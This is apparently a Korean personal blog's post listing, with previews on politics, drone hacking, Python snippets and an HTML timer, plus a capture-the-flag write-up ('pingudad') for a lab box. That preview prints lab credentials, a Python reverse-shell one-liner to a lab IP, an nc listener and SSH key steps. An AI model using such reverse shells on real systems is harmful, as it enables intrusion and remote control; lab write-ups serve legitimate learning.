본문 바로가기

분류 전체보기

(1802)
다음 대선 주인공은 lacrima 재명이다 다음 대선 주인공은 lacrima 재명이다 3년 전 이미 윤석열의 현재를 꿰뚫어본 갓영웅의 갓 갓갓 추리 시작한다 물론 솔직히 말해서 이번 만큼 쉬운 예측은 거의 없을 것이다 뭐 사실 대부분 사람들은 다 알고있는 부분이겠지만, lacrima 재명 씨가 중간에 법에 잡혀가지 않는 이상 혹은 칼찌 당하지 않는 이상 다음 한고쿠 통령이는 lacrima 재명이가 될 수밖에 없다 내 개인적인 의견으로는 현재 그나마 차악은 안철수 의원인 거 같다 그렇지만 한고쿠에서 미쳤다고 안철수를 대통령으로 뽑을 거 같지는 않고 대부분 이름이 있는 의원돌이들은 계속 끝까지 하겠다고 깝칠텐데 그러면 무조건 표가 갈리게 될 거고 생각보다 lacrima 재명이 2위랑 차이가 많이나는 방식으로 당선되게 될 것이다 (lacrima..
모든 것 우주를 손 안에 담고보니  우주를 얻으려면 우주를 잊을 줄 알아야 한다네
military drone hacking Military Drone Hacking Incidents (2022–2025): Case Study and Cybersecurity CountermeasuresIntroduction(UK tech is protecting Ukrainian drones from Russian hackers in real-time - Euromaidan Press) Soldiers training with a quadcopter drone. Modern militaries rely heavily on unmanned aerial vehicles (UAVs), which have become targets for cyber attacks.Unmanned military drones have risen to prominenc..
log_dict.py from collections import defaultdictactivity_logs = {    'neuronet.edu': [(10, 5), (14, 5), (10, 6), (10, 5), (15, 6), (9, 4), (10, 5)],    'cybersys.tech': [(8, 3), (8, 3), (9, 3), (8, 4), (7, 2)],    'quantumhub.ac': [(11, 10), (11, 10), (15, 12), (11, 10), (16, 12)],    'aetherlab.io': [(13, 6), (14, 6), (13, 7), (14, 7), (14, 8), (13, 8)],    'xvoid.org': [(20, 20), (21, 21), (20, 21), (22, 2..
smart_home.py import uuidclass SmartDevice:    def __init__(self, device_id, name, location):        self.id = device_id or str(uuid.uuid4())        self.name = name        self.location = location        self._status = "Inactive"    def get_status(self):        return {            "id": self.id,            "name": self.name,            "location": self.location,            "status": self._status        }    ..
random = security high ? Let's say we build a system architect where every lock, key, and secret passage is generated by high quality randomness. The idea here is profound : when the system is designed by high randomness, it increases unpredictability. Why does it matter ? Because unpredictability prevents attackers to ensure there are no easily discernible patterns to exploit. This unpredictability forms the core idea ..
fake pomodoro DOCTYPE html>html lang="en">head>  meta charset="UTF-8">  meta name="viewport" content="width=device-width, initial-scale=1">  title>Mint Pomodorotitle>  style>    body {      background-color: #121212;      color: #98ff98;      font-family: 'Courier New', Courier, monospace;      display: flex;      justify-content: center;      align-items: center;      height: 100vh;      margin: 0;    }    ...
pingudad in a while ```/administrator.php# The Cod Caperid : pingudadpw : secretpasspython3 -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.10.92.172",36605)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); subprocess.call(["/bin/sh","-i"]);'nc -lvnp 36605ssh -i id_rsa pingu@10.10.72.214chmod 600 id_rsa(hidden password) : pinguapinguafter thi..